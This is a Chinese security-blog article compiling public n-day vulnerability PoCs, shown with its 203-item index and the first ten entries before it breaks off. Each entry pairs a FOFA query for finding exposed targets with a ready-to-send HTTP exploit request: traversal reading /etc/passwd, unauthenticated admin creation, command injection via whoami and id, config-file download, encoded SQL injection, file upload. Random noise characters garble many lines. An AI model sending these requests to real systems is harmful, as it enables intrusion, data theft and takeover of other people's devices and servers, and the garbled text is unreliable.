互联网公开漏洞整理202309-202406
! g/ t1 ~2 i" j, z6 o9 Y3 Q道一安全 2024-06-05 07:41 北京 T) h1 w3 @1 V1 P
以下文章来源于网络安全新视界 ,作者网络安全新视界
{& l V' [4 j) n2 Z) j9 K
+ H* m2 I; l7 A" A& `发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。4 i' _4 z b2 {* x" {# h0 S0 A
: N4 t) |& W5 Z漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。3 S3 r. q5 |/ l
3 q& P( O+ |+ V. S0 X# r# B- D1 @安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
2 V& U( `: H$ r3 H1 v/ D8 ^9 c6 b5 k. F0 i9 ^# [
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
5 Y* L, ]) n: B
. J) K" O+ j1 X& b7 o4 j U合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
* v! Q) x% }0 a
7 \% @+ K- v* D" e4 t* P' v. Z- I5 J' W3 j- ?
声明6 r( e6 B5 R, T6 V; ^- Z! D0 d$ u
* J& M' E; R( e9 E7 L
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
8 L0 ]1 u- E% m7 Y/ ~9 a4 E% o: k5 B7 Y# ]" g) F+ V
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。6 Z4 i+ a8 x' F, t
% o7 [, j0 g& W6 y4 P, A6 B
! \: S, A1 ~9 S$ A
" K4 f" _: T2 T' L: J; Y目录" g# b s3 [. E/ ?/ \- m3 o7 _9 {
" n" X2 a0 C3 Z" P01( Q6 |( C# G) s" `1 _6 k
) l0 f( K4 D8 B! ~5 B6 E
1. StarRocks MPP数据库未授权访问
" s. S3 ]6 Q( l2. Casdoor系统static任意文件读取$ |9 B# h& x, `& b
3. EasyCVR智能边缘网关 userlist 信息泄漏* V( r, f2 ^& L) G
4. EasyCVR视频管理平台存在任意用户添加
. i; Y; \! S/ Q o9 I4 j5. NUUO NVR 视频存储管理设备远程命令执行* }/ e0 @6 X; S2 Y. J! a9 `
6. 深信服 NGAF 任意文件读取
. N: M( L4 q! d$ H1 V z, T# n$ \7. 鸿运主动安全监控云平台任意文件下载
0 D7 C0 ?, e4 t8 u: {% L7 @, @0 S8. 斐讯 Phicomm 路由器RCE
, ]; t8 P6 R/ f) m0 o. h& V6 q1 A9. 稻壳CMS keyword 未授权SQL注入
, |, S" S$ W/ @" |4 c+ F* J10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' v/ z2 Z* z) A, J0 }8 G
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入- V3 ?% [5 h, O0 P
12. Jorani < 1.0.2 远程命令执行
) e. R0 O- q; {7 {( X* G13. 红帆iOffice ioFileDown任意文件读取# L# b- c9 w+ T- D! a' W, m
14. 华夏ERP(jshERP)敏感信息泄露( t B: g Q) ]) ?4 J' l, F4 p
15. 华夏ERP getAllList信息泄露
9 s8 I* c) F. A0 j9 b3 ]16. 红帆HFOffice医微云SQL注入6 U% z- O# _# X) J# S, l
17. 大华 DSS itcBulletin SQL 注入; @ p' k) I3 Z$ o
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
2 S$ X- O) r4 [& s, K. v3 t19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入% [3 v/ W* O7 U( I
20. 大华ICC智能物联综合管理平台任意文件读取
! o3 r) O4 ~0 n F+ y21. 大华ICC智能物联综合管理平台random远程代码执行
; m6 k8 \2 J5 v; ^/ J; r6 W22. 大华ICC智能物联综合管理平台 log4j远程代码执行- ]% Y8 U9 R0 ]$ g! q+ v
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行6 d/ c+ }2 V- |0 N1 v7 Z
24. 用友NC 6.5 accept.jsp任意文件上传
8 N4 }& o W3 j! G! U25. 用友NC registerServlet JNDI 远程代码执行* ^* a) @" K- O$ p3 [* k+ j
26. 用友NC linkVoucher SQL注入6 ^5 Y4 V2 \ }: i
27. 用友 NC showcontent SQL注入
5 {' i1 s( z" `: N) F4 M28. 用友NC grouptemplet 任意文件上传
# L3 S) B, c' w29. 用友NC down/bill SQL注入- D3 W0 G0 Q; W7 I5 g
30. 用友NC importPml SQL注入
. _ ^- R; R$ f- T6 X31. 用友NC runStateServlet SQL注入2 f% p- Z$ X+ p9 h, f F# v
32. 用友NC complainbilldetail SQL注入
, J( a2 ~9 t' z! l7 C33. 用友NC downTax/download SQL注入+ w, a) f" d+ G
34. 用友NC warningDetailInfo接口SQL注入( ~4 X3 v: n4 u6 M) N6 q! }" ^
35. 用友NC-Cloud importhttpscer任意文件上传
; p- S. L- m) @1 V; Q7 l" K36. 用友NC-Cloud soapFormat XXE! v6 W- I( o h6 _1 X9 u: y/ @
37. 用友NC-Cloud IUpdateService XXE
# x# ]8 _/ Y" U- T- P. B7 J38. 用友U8 Cloud smartweb2.RPC.d XXE
{2 s! ?7 X' _: K5 A T39. 用友U8 Cloud RegisterServlet SQL注入
, i n7 m+ z3 ^0 ^* P9 y( O( l40. 用友U8-Cloud XChangeServlet XXE
5 ~6 h1 u& o0 Y5 o6 |41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
7 k4 x- E. F- k9 k1 H5 D42. 用友GRP-U8 SmartUpload01 文件上传
& \: v7 Z5 [3 e9 X5 W9 x- ~3 F& B43. 用友GRP-U8 userInfoWeb SQL注入致RCE* ], _0 W* P; c: _3 f% n0 D/ b" d
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
+ @8 @% P: |, w! \* o. z2 V( o5 q- O45. 用友GRP-U8 ufgovbank XXE
4 y. ^/ @* s2 M4 {1 d4 E7 d46. 用友GRP-U8 sqcxIndex.jsp SQL注入
* w6 J+ i9 j. t0 L$ a O3 m% v47. 用友GRP A++Cloud 政府财务云 任意文件读取
H9 l! h# J7 H! Y6 d% W48. 用友U8 CRM swfupload 任意文件上传7 J+ g+ b0 z9 y" z
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
9 W( A7 C% c: @50. QDocs Smart School 6.4.1 filterRecords SQL注入* f' O3 M: n1 ^9 s( v" L
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入: [0 \5 ^, Q5 r+ |/ \6 X3 W
52. 泛微E-Office json_common.php sql注入
1 K$ e0 c$ @6 D+ }7 Y( m3 U& {) ]; O53. 迪普 DPTech VPN Service 任意文件上传* a" L8 }0 U* \* j1 t
54. 畅捷通T+ getstorewarehousebystore 远程代码执行. t* B$ @8 S0 ]( d/ w- Z/ f8 [3 l
55. 畅捷通T+ getdecallusers信息泄露
/ l; k6 {3 A! Z( {# c* y$ ^56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE/ Q: {: _4 S& S: \; R/ M/ Z
57. 畅捷通T+ keyEdit.aspx SQL注入
7 N# W5 f8 o% i- N( {$ r& v. @9 s58. 畅捷通T+ KeyInfoList.aspx sql注入
$ t! p- B/ F: C7 l0 j( s7 D. D: |1 j59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行) ^3 P0 |& X5 n. _' c( B
60. 百卓Smart管理平台 importexport.php SQL注入
* H$ p) M! d' Q0 m1 B% p) e61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
9 a/ {% l( G; E% n" r$ B. ]62. IP-guard WebServer 远程命令执行
5 V8 u x6 i, y8 x$ L63. IP-guard WebServer任意文件读取/ f- B6 W. _: ]4 u {
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
$ l( ~3 H' Y8 ^6 X" Q- C+ ?3 ]/ ?65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过4 }+ a: S; g; f+ f: u
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
$ A+ g& {: N0 d: S7 K4 l67. 万户ezOFFICE wpsservlet任意文件上传
. l+ }* \+ R; K; @68. 万户ezOFFICE wf_printnum.jsp SQL注入2 G1 R* h" o1 i3 b$ I
69. 万户 ezOFFICE contract_gd.jsp SQL注入- @) [" b! d0 W7 d3 C' D
70. 万户ezEIP success 命令执行6 V0 b# O( [: A8 D; }
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入$ K, y2 q5 V2 K3 s% T* F
72. 致远OA getAjaxDataServlet XXE9 I+ f, { j% q. Y
73. GeoServer wms远程代码执行( E9 X4 L2 f( ^! Z1 t) c
74. 致远M3-server 6_1sp1 反序列化RCE
. j M( c4 N3 H( y& ?* J, M1 ]75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE4 ]% k' q1 F1 e% R
76. 新开普掌上校园服务管理平台service.action远程命令执行
0 k' A0 z3 F0 R+ v _) O77. F22服装管理软件系统UploadHandler.ashx任意文件上传
9 t5 f, r6 P( @78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
8 R2 _( f/ b4 L2 L79. BYTEVALUE 百为流控路由器远程命令执行
) o& P+ |! ~* p0 R' g80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传5 w. A/ i- r" I) `& p
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露5 l# D) K: U0 ]. h# W
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行1 K/ E3 k4 s u1 k. t
83. JeecgBoot testConnection 远程命令执行
, i$ Y' b$ j* Q84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
: }2 S K/ {: i- y/ B85. SysAid On-premise< 23.3.36远程代码执行
2 j; Q$ c" ?& m/ T86. 日本tosei自助洗衣机RCE
0 z# q( k; [8 `( P! G87. 安恒明御安全网关aaa_local_web_preview文件上传
$ M, B- C; `& D n3 _4 W88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行* w0 G& t K4 d7 V
89. 致远互联FE协作办公平台editflow_manager存在sql注入- g% X/ ]# U/ y3 Q+ T5 x
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
s9 P7 h2 {5 @$ b& u91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取8 U. \8 n) {3 Z# j- F9 L7 z
92. 海康威视运行管理中心session命令执行
$ a1 Y! B+ C' {: q' n93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传& `* d- {- U1 j4 Z* k
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
' D9 q: ?! z/ u4 n0 V/ U* X, m95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
! T' ^$ Z2 G; q/ Y96. Apache OFBiz 18.12.11 groovy 远程代码执行' Y# m) t2 ]4 {4 H; S' \
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行' T7 `& c- R {8 p3 C; J
98. SpiderFlow爬虫平台远程命令执行9 I' N! o0 F( s/ N) _6 Y0 X1 C* c
99. Ncast盈可视高清智能录播系统busiFacade RCE
4 M V9 O' `# }5 R6 i ^100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传& B8 ?1 E: u8 U$ x4 }4 H3 z
101. ivanti policy secure-22.6命令注入
5 q$ z. _/ z" |3 d102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
$ k4 C/ Q9 F- _/ X* @103. Ivanti Pulse Connect Secure VPN XXE+ E3 t) Z# K5 k" n
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露9 h7 q9 M" j/ Y8 A2 w4 d" @& J* r; o1 m
105. SpringBlade v3.2.0 export-user SQL 注入 M' t x2 {, h& @' Y+ T, u* O3 B
106. SpringBlade dict-biz/list SQL 注入
. d' g3 B. q9 G6 i, |( L107. SpringBlade tenant/list SQL 注入
0 k- j8 N3 S2 r5 |108. D-Tale 3.9.0 SSRF8 E; t; |6 S2 _
109. Jenkins CLI 任意文件读取8 D& z" ?0 x/ U' N' u8 I: c
110. Goanywhere MFT 未授权创建管理员
9 T) s4 o0 L7 b2 Y" n/ G111. WordPress Plugin HTML5 Video Player SQL注入
) j" J* g+ H; w- J+ b* c112. WordPress Plugin NotificationX SQL 注入
6 Z. T2 X# v# e9 j& k113. WordPress Automatic 插件任意文件下载和SSRF
& f0 ?' @+ H# N$ A) V114. WordPress MasterStudy LMS插件 SQL注入& @0 z b4 v) w2 R# K2 r' ?7 d4 f
115. WordPress Bricks Builder <= 1.9.6 RCE* g$ ^2 C; p# @( w2 a6 K0 {1 y
116. wordpress js-support-ticket文件上传4 w0 v2 x6 U( D' n
117. WordPress LayerSlider插件SQL注入) F% v2 E Z; X P( h
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
4 {3 k! V( k% W119. 北京百绰智能S20后台sysmanageajax.php sql注入
& c5 `7 D" W6 {% G- `0 C( q120. 北京百绰智能S40管理平台导入web.php任意文件上传$ K& z8 d5 j8 \; y! n
121. 北京百绰智能S42管理平台userattestation.php任意文件上传' v9 x" X; C1 H! \+ U
122. 北京百绰智能s200管理平台/importexport.php sql注入
' |; \& }! ]7 q/ C2 _123. Atlassian Confluence 模板注入代码执行- f7 Z F& D3 _# s! W9 }+ z5 F- ]/ Q
124. 湖南建研工程质量检测系统任意文件上传' p! J# ]2 r% D' X; t! n' W8 v! Y
125. ConnectWise ScreenConnect身份验证绕过
2 x$ G- Q6 R# d# M) d! M126. Aiohttp 路径遍历
" [6 k! c: ?% h7 U, y1 S1 S127. 广联达Linkworks DataExchange.ashx XXE
7 z w0 W R) \( G) Q6 y( d128. Adobe ColdFusion 反序列化1 T* n8 z( Q( N K& l2 T
129. Adobe ColdFusion 任意文件读取' p' T& W6 A$ g7 m
130. Laykefu客服系统任意文件上传
8 ]3 ~6 J+ p- C131. Mini-Tmall <=20231017 SQL注入
# ?0 n- p4 [) z4 [2 \132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过7 Y% l3 A/ a! y2 n- o# l' C
133. H5 云商城 file.php 文件上传
2 J I: p3 Z d* w, M5 F+ y134. 网康NS-ASG应用安全网关index.php sql注入. w- o' L. S: ?3 Z
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
) x/ w" Y7 u, X3 j C9 h4 q136. NextChat cors SSRF! m7 d+ j8 U# T4 T+ I
137. 福建科立迅通信指挥调度平台down_file.php sql注入6 W$ x, E/ k! g- D/ T" `5 b
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
; D, X4 O& C" d- ^# o* ~139. 福建科立讯通信指挥调度平台editemedia.php sql注入
/ {4 S# b$ c' h6 X" @140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
& T0 R( w0 X2 x+ k# c6 N141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
* A% ~" I$ w3 S6 Y( Z! a142. CMSV6车辆监控平台系统中存在弱密码9 l% @! X" O) V
143. Netis WF2780 v2.1.40144 远程命令执行; x0 T: @0 w3 p; G
144. D-Link nas_sharing.cgi 命令注入, ?2 \- X/ k8 e" ~
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入: e1 g2 f. _2 b. p7 U L! Z
146. MajorDoMo thumb.php 未授权远程代码执行
7 Z' @+ K! n0 A2 l& `0 m0 t147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
2 l: R% p6 C' q5 \" x148. CrushFTP 认证绕过模板注入8 C% T4 u) f0 n( X% l( \& P
149. AJ-Report开源数据大屏存在远程命令执行1 w, @$ j5 g/ f% {* o
150. AJ-Report 1.4.0 认证绕过与远程代码执行
3 q: y: k- V2 B4 _7 b151. AJ-Report 1.4.1 pageList sql注入
5 p( p& `7 u* M: o; u) t6 X: d152. Progress Kemp LoadMaster 远程命令执行$ D0 ~; h4 `( s1 S
153. gradio任意文件读取* j5 Z% v; J g' e5 H
154. 天维尔消防救援作战调度平台 SQL注入
# M9 a/ `7 f4 l, r. F/ J, u2 O155. 六零导航页 file.php 任意文件上传
5 v; g( I/ J/ H2 A- i! E( y156. TBK DVR-4104/DVR-4216 操作系统命令注入
3 z; ^. i3 Y7 f( X& X157. 美特CRM upload.jsp 任意文件上传
4 m8 o/ z. [5 q# w7 _4 U. S2 B158. Mura-CMS-processAsyncObject存在SQL注入
8 g# }1 E3 K# J% c( T% D159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
* u7 i* w- d& @( }5 x2 b160. Sonatype Nexus Repository 3目录遍历与文件读取6 [% m# z1 B& Z9 X; U, n* L
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传+ z: E% O- \" C1 @! K
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传* t7 `- Z. c; x. a
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
1 ~( k" x! [0 v% a; q/ [. H164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传" B4 @; x; a% k0 J7 [; V( V* n6 Q
165. OrangeHRM 3.3.3 SQL 注入2 u6 s. e# S8 K! E) Z8 ]0 h
166. 中成科信票务管理平台SeatMapHandler SQL注入
# s: J( a+ B! B S% w& n167. 精益价值管理系统 DownLoad.aspx任意文件读取6 U; p% m* x. X9 i8 i/ u% W2 g, y
168. 宏景EHR OutputCode 任意文件读取' e- C; J+ ?- M, ]+ y& K
169. 宏景EHR downlawbase SQL注入
8 ? {! |; t1 b+ A/ b170. 宏景EHR DisplayExcelCustomReport 任意文件读取
5 U/ D+ L% d4 K( a171. 通天星CMSV6车载定位监控平台 SQL注入9 L* m' H. K( A+ i3 D3 N5 h& D, x
172. DT-高清车牌识别摄像机任意文件读取
4 b* O7 L5 u- E; x+ p* A0 D& W173. Check Point 安全网关任意文件读取0 i3 G r8 W; {) g& P: m
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
7 p# _- H$ D- n1 W: F9 m% N b175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
+ F$ B# j$ U: ~& ]$ y176. 电信网关配置管理系统 rewrite.php 文件上传
! {# t: j( s3 ]; A3 i( Y177. H3C路由器敏感信息泄露# `: f4 H: j0 a2 s: O
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
1 L1 [5 s2 I: c4 x; W6 V; _' B7 D" {179. 建文工程管理系统存在任意文件读取
G: z5 e) m$ T, p4 j180. 帮管客 CRM jiliyu SQL注入" r- E. T* s; r& s, s
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入 E2 J$ D* Y: d$ e9 L5 C3 |
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建8 I" ^. t9 K, p" M7 \$ s F
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
# E: x1 _$ B: c+ D! L$ A184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加4 K) p4 I4 G( N* k6 C% L/ W1 p
185. 瑞友天翼应用虚拟化系统SQL注入
" H7 d# A* I2 T9 p& F! b, ?186. F-logic DataCube3 SQL注入) l. K' C: @# n m% `, {4 r
187. Mura CMS processAsyncObject SQL注入; B6 r, L* r) e0 S( N# n4 W
188. 叁体-佳会视频会议 attachment 任意文件读取
- j$ z, y. i" L- V( K189. 蓝网科技临床浏览系统 deleteStudy SQL注入
0 u: C2 y k) @0 h; Q190. 短视频矩阵营销系统 poihuoqu 任意文件读取
8 E% }* J. ^* o; k9 K191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入& f# h+ g% w5 L! \' ]
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传1 c( J0 Z) l' h6 D% p) f9 i9 S3 M
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行! ]: \- J9 N9 y q
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
* B9 h3 p+ R8 } e2 k195. 飞鱼星上网行为管理系统 send_order.cgi命令执行" Z5 C* U8 m! w( c M6 Y M
196. 河南省风速科技统一认证平台密码重置& I" ~* a; K0 z
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入$ X) B/ i, \. d0 v( J) |
198. 阿里云盘 WebDAV 命令注入
_6 I) I. \8 S199. cockpit系统assetsmanager_upload接口 文件上传
4 C# x; C) G# i, p6 i200. SeaCMS海洋影视管理系统dmku SQL注入. K7 I) O0 L8 |# {' M. E
201. 方正全媒体新闻采编系统 binary SQL注入8 T: k% k: b' [4 ^7 k
202. 微擎系统 AccountEdit任意文件上传
) ?) G, Y) h. ]& Z5 a203. 红海云EHR PtFjk 文件上传! p( h5 q; k' k' `
. B# h' e2 X5 U
POC列表
) D5 j* ] G* W( J% E! I$ a1 F% s; l- _; k9 a
02
. l# D$ {9 _; C* F% r( s# @8 L% }; B3 h+ O" b
1. StarRocks MPP数据库未授权访问
& M# H$ Y: C% [" F fFOFA :title="StarRocks"% g) D. c0 x4 I- |
GET /mem_tracker HTTP/1.1
Z5 v' B8 ]2 x: ]" D8 [Host: URL- N% h- w0 O. q+ n0 t. V3 W
* {4 a. x: ?& Y( M
" ?* } y/ u( k7 I% R2. Casdoor系统static任意文件读取
7 q9 O% F( i2 g. t7 d/ BFOFA :title="Casdoor"& Z6 f$ X0 d! p2 j' E) |0 I4 @( u
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1: U6 N0 f! u, r* ]' B' e
Host: xx.xx.xx.xx:9999
: z6 Y, V, J4 }1 h9 k5 _: sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' ^# y- F6 t# L) ?: X' B/ Q$ a! r, ?Connection: close( h8 u3 s9 i3 n' O3 e {
Accept: */*
0 r R" u7 F7 c0 u7 `Accept-Language: en
- R* y/ y& U+ V: _, z3 mAccept-Encoding: gzip
; `, y0 t" x: y+ K
0 E) v$ f% p% M$ P/ h G! i- U6 `/ y5 c4 j( m
3. EasyCVR智能边缘网关 userlist 信息泄漏
" `' b0 j( @( K6 U1 d ?. L- kFOFA :title="EasyCVR"1 i/ x8 q5 r8 Q8 c" J
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
$ O+ _$ D: \4 H' _3 B AHost: xx.xx.xx.xx
- @! \0 @# w) K8 O) Y% G) ~2 E3 P. j
m3 x6 \8 E* G" d2 h6 S4. EasyCVR视频管理平台存在任意用户添加
* p2 D" k/ V {4 Q5 ^4 S# E qFOFA :title="EasyCVR"& _+ O1 Y' ]. |5 N3 W
& t- i5 S0 ~: {. Rpassword更改为自己的密码md5
0 X" M! F6 W& |7 o4 e: S! jPOST /api/v1/adduser HTTP/1.11 Z% Y% s6 w- p& A& g
Host: your-ip8 Z" |- v* Z h; V' C
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
) |0 R" o0 Z, H+ G7 C! Q/ r' b8 a" C8 R
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1! @3 l" g! @) c2 I" I9 ]& q% Z* b
5 {- P( {9 Y0 z% B7 l! w0 _. t- h+ R
9 v7 d4 P9 u- j, q l; o5. NUUO NVR 视频存储管理设备远程命令执行2 Z0 P" N. S5 Q$ U8 K) B
FOFA:title="Network Video Recorder Login"
. V4 t: A3 [, ~' S; A6 LGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
8 Y2 c6 p8 m0 `- f( P$ y7 _$ sHost: xx.xx.xx.xx
7 Z8 v3 ?' g8 G* }2 r4 L4 w. @9 t$ ` W' v1 P3 R2 F4 s; P
( f9 y# Z f/ i( b5 }. h
6. 深信服 NGAF 任意文件读取. N$ l1 b8 g8 r( l V! P2 l! e
FOFA:title="SANGFOR | NGAF"
. ~- N3 ]2 t8 L" r* yGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.13 q7 g' n' f: c8 U/ h$ D
Host:
4 J3 e* _, R" }
+ a/ G' s6 ~3 t8 }' g' M
A( _2 w# d& h \! e: S3 h9 `, w7. 鸿运主动安全监控云平台任意文件下载$ l1 h: x' F6 {8 i9 H
FOFA:body="./open/webApi.html"
$ U3 `( o- H$ R3 X. B w t' ?GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1& L# {. F5 o/ f6 I! o8 j. P
Host:4 z9 x& a3 q& c4 ?: f- k
" c4 z( e4 s/ ~2 F P# s5 R8 e7 U9 @) c' \! i& g
8. 斐讯 Phicomm 路由器RCE& k4 C7 x9 G: n
FOFA:icon_hash="-1344736688"/ V! i* B: N: }$ \, h4 m5 z
默认账号admin登录后台后,执行操作
) V3 N7 T; \* I3 G+ QPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
+ e. B* ?4 R" O; l: Q, s# O PHost: x.x.x.x
! O" Z9 F4 Y z: a- M JCookie: sysauth=第一步登录获取的cookie3 p4 A3 _: [: P$ D" {. o- n# F2 \
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
3 q1 m9 g6 Y; g/ [7 |User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
# y3 h6 f4 k \- r- J# c9 E! @( B9 T9 O4 F+ T. O& N
------WebKitFormBoundaryxbgjoytz
0 o( X `8 z4 J9 Y$ g; J: WContent-Disposition: form-data; name="wifiRebootEnablestatus"9 T2 O$ L) s' \; W* F; Q; s% ~
9 c3 x! x7 x7 `7 T. N7 W3 k" p; V
%s
* o. r' z* o! Y% N( z------WebKitFormBoundaryxbgjoytz' J9 w( [& c. P Y3 E7 L
Content-Disposition: form-data; name="wifiRebootrange"5 s' p8 [/ w4 v9 n; A
+ Q7 K) ~# E1 v1 W3 G
12:00; id;
( f- `4 v% Q, f2 [------WebKitFormBoundaryxbgjoytz
3 ~7 a) d" j) aContent-Disposition: form-data; name="wifiRebootendrange" J" M5 t4 Q. I: i
i# G! C7 c. n$ \- F
%s:0 z+ p9 |9 K/ ^3 J- f
------WebKitFormBoundaryxbgjoytz
D- C0 z& V |- z3 w% XContent-Disposition: form-data; name="cururl2"
6 S* q( m2 s1 |1 |7 Y) W4 @
# Z, I, k( V6 \9 V5 q* v- H9 S+ C9 ~2 W' R6 Y6 \; o3 M! C
------WebKitFormBoundaryxbgjoytz--% X1 C1 q) U' J! d% R
0 u" E1 N3 M0 w( w9 |
0 ?& N j3 f7 k9 k' Q2 H! {9. 稻壳CMS keyword 未授权SQL注入1 k) w( ^4 N( h) s
FOFA:app="Doccms"
8 e7 C! G; j- i2 B0 {8 {GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1- E' U" x/ q' ]8 `, M$ ^+ k8 m, f" x
Host: x.x.x.x
6 n- u+ p# H/ l# L" U( x# ^* s' m) j% }/ v# E
2 c6 Z5 j. w2 w5 S* W. Zpayload为下列语句的二次Url编码
6 w) {) P5 R1 B& J& J/ R
$ ~3 s3 |# E) V, L' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
( A0 U% a0 o' c# l3 H& r
% U7 M, j- e8 q7 |. k2 n3 q8 ~10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
5 P; H" ?$ @) i. F* s8 {FOFA:icon_hash="953405444"
?% } l4 a+ l
3 d- A [8 y6 P8 V! v9 K& r" X1 J文件上传后响应中包含上传文件的路径
) N/ E6 w# T3 WPOST /eis/service/api.aspx?action=saveImg HTTP/1.1; e" f% ], ~/ \( H2 }" `3 f6 i
Host: x.x.x.x:xx
% F* d( S- D. N7 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
/ ~& d& G7 L% I# d- G6 t5 AContent-Length: 1979 y: \# u% O8 ~6 ]' m7 F5 S' ?+ g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% ?1 x0 M3 A4 p
Accept-Encoding: gzip, deflate i+ S, r8 i7 h6 Z
Accept-Language: zh-CN,zh;q=0.9
0 z- J/ C$ w% q& H4 o, m zConnection: close
* C9 ^. r( }9 S9 n. ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu" d2 I- l1 A& E# u4 ?" D) I
6 V; s" e6 y4 Z, U3 L------WebKitFormBoundaryxdgaqmqu% ]# K- |- A9 i1 k9 \- `3 J p
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
% s6 M2 x0 @) M$ FContent-Type: text/html1 {( [' Z) Q4 P9 r% z6 y
0 V5 W8 z0 H9 C- ~
jmnqjfdsupxgfidopeixbgsxbf
4 n. U6 U# O4 h! n9 `------WebKitFormBoundaryxdgaqmqu--6 V S* J6 I) v! _0 |: K
/ b% K& e3 t) z3 `0 L
) U6 U4 M6 q* o7 I
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入$ i6 b2 U2 V8 E: \( M/ a4 R9 D8 Z4 I; m$ f
